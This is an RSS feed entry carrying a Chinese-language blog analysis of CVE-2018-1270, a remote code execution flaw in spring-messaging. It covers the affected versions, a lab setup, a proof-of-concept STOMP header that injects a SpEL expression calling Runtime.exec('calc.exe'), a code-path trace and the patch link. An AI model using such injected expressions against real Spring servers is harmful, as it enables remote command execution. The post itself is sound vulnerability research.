Spring on 诗与胡说 https://kylingit.com/tags/spring/index.xml Recent content in Spring on 诗与胡说 Hugo -- gohugo.io zh_cn Copyright © 2021 Kylinking CVE-2018-1270 spring-messaging Remote Code Execution 分析 https://kylingit.com/blog/cve-2018-1270-spring-messaging-remote-code-execution-%E5%88%86%E6%9E%90/ Wed, 11 Apr 2018 11:07:18 +0000 https://kylingit.com/blog/cve-2018-1270-spring-messaging-remote-code-execution-%E5%88%86%E6%9E%90/ <h4 id="0x01-概述">0x01 概述</h4> <p><a href="https://pivotal.io/security/cve-2018-1270">CVE-2018-1270: Remote Code Execution with spring-messaging</a></p> <h4 id="0x02-影响版本">0x02 影响版本</h4> <ul> <li>Spring Framework 5.0 to 5.0.4</li> <li>Spring Framework 4.3 to 4.3.15</li> <li>Older unsupported versions are also affected</li> </ul> <h4 id="0x03-环境搭建">0x03 环境搭建</h4> <pre><code>git clone https://github.com/spring-guides/gs-messaging-stomp-websocket git checkout 6958af0b02bf05282673826b73cd7a85e84c12d3 </code></pre> <h4 id="0x04-漏洞利用">0x04 漏洞利用</h4> <p>在app.js中增加一个header头</p> <pre><code class="language-js">function connect() { var header = {&quot;selector&quot;:&quot;T(java.lang.Runtime).getRuntime().exec('calc.exe')&quot;}; var socket = new SockJS('/gs-guide-websocket'); stompClient = Stomp.over(socket); stompClient.connect({}, function (frame) { setConnected(true); console.log('Connected: ' + frame); stompClient.subscribe('/topic/greetings', function (greeting) { showGreeting(JSON.parse(greeting.body).content); }, header); }); } </code></pre> <p>spring-boot:run运行,connect建立连接后,点击发送触发漏洞</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/kVdWA" alt="clac" /></p> <h4 id="0x05-漏洞分析">0x05 漏洞分析</h4> <p>在点击发送消息后,spring-message会对消息头部进行处理,相关方法在<code>org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java</code> <code>addSubscriptionInternal()</code></p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/tvQk8" alt="selector" /> 通过<code>sessionId</code>和<code>subsId</code>确定一个<code>selector</code>属性,后续服务端就通过这个<code>subsId</code>来查找特定会话,也就是从<code>headers</code>头部信息查找<code>selector</code>,由<code>selector</code>的值作为expression被执行</p> <p>点击Send后,<code>org/springframework/messaging/simp/broker/SimpleBrokerMessageHandler.java</code>接收到message,message的headers头部信息包含了selector的属性,message传进<code>this.subscriptionRegistry.findSubscriptions</code>,由<code>findSubscriptions()</code>进行处理</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/NUWfs" alt="sendMessageToSubscribers" /></p> <p>跟进相关方法 <code>org/springframework/messaging/simp/broker/DefaultSubscriptionRegistry.java</code></p> <pre><code class="language-java">@Override protected MultiValueMap&lt;String, String&gt; findSubscriptionsInternal(String destination, Message&lt;?&gt; message) { MultiValueMap&lt;String, String&gt; result = this.destinationCache.getSubscriptions(destination, message); return filterSubscriptions(result, message); } </code></pre> <p>result的值作为<code>filterSubscriptions()</code>的<code>allMatches</code>参数传入,遍历出<code>sessionId</code>和<code>subsId</code>,此时的result为</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/1AvIp" alt="result" /> 跟进<code>filterSubscriptions()</code></p> <p>经过两层for循环,id为<code>sub-0</code>的subscription被赋值给<code>sub</code>(P.S. 此图是后来补的,故sessionId不一样)</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/wHSXE" alt="for" /> <img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/QY3Ep" alt="sub" /> 通过<code>sub.getSelectorExpression()</code>得到<code>expression</code>的值,此时的<code>expression</code>就包含着我们发送的表达式</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/zwRxS" alt="expression" /></p> <p>再往下,执行到<code>expression.getValue()</code>,SpEL得到执行,触发poc</p> <p><img src="https://blog-1252261399.cos-website.ap-beijing.myqcloud.com/images/vJ027" alt="calc" /></p> <h4 id="0x06-补丁">0x06 补丁</h4> <p><a href="https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a#diff-ca84ec52e20ebb2a3732c6c15f37d37a">https://github.com/spring-projects/spring-framework/commit/e0de9126ed8cf25cf141d3e66420da94e350708a#diff-ca84ec52e20ebb2a3732c6c15f37d37a</a></p> <h4 id="0x07-参考">0x07 参考</h4> <ul> <li><a href="https://chybeta.github.io/2018/04/07/spring-messaging-Remote-Code-Execution-%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1270%E3%80%91/">https://chybeta.github.io/2018/04/07/spring-messaging-Remote-Code-Execution-%E5%88%86%E6%9E%90-%E3%80%90CVE-2018-1270%E3%80%91/</a></li> <li><a href="http://blog.nsfocus.net/spring-messaging-analysis/">http://blog.nsfocus.net/spring-messaging-analysis/</a></li> <li><a href="https://www.anquanke.com/post/id/104140">https://www.anquanke.com/post/id/104140</a></li> </ul>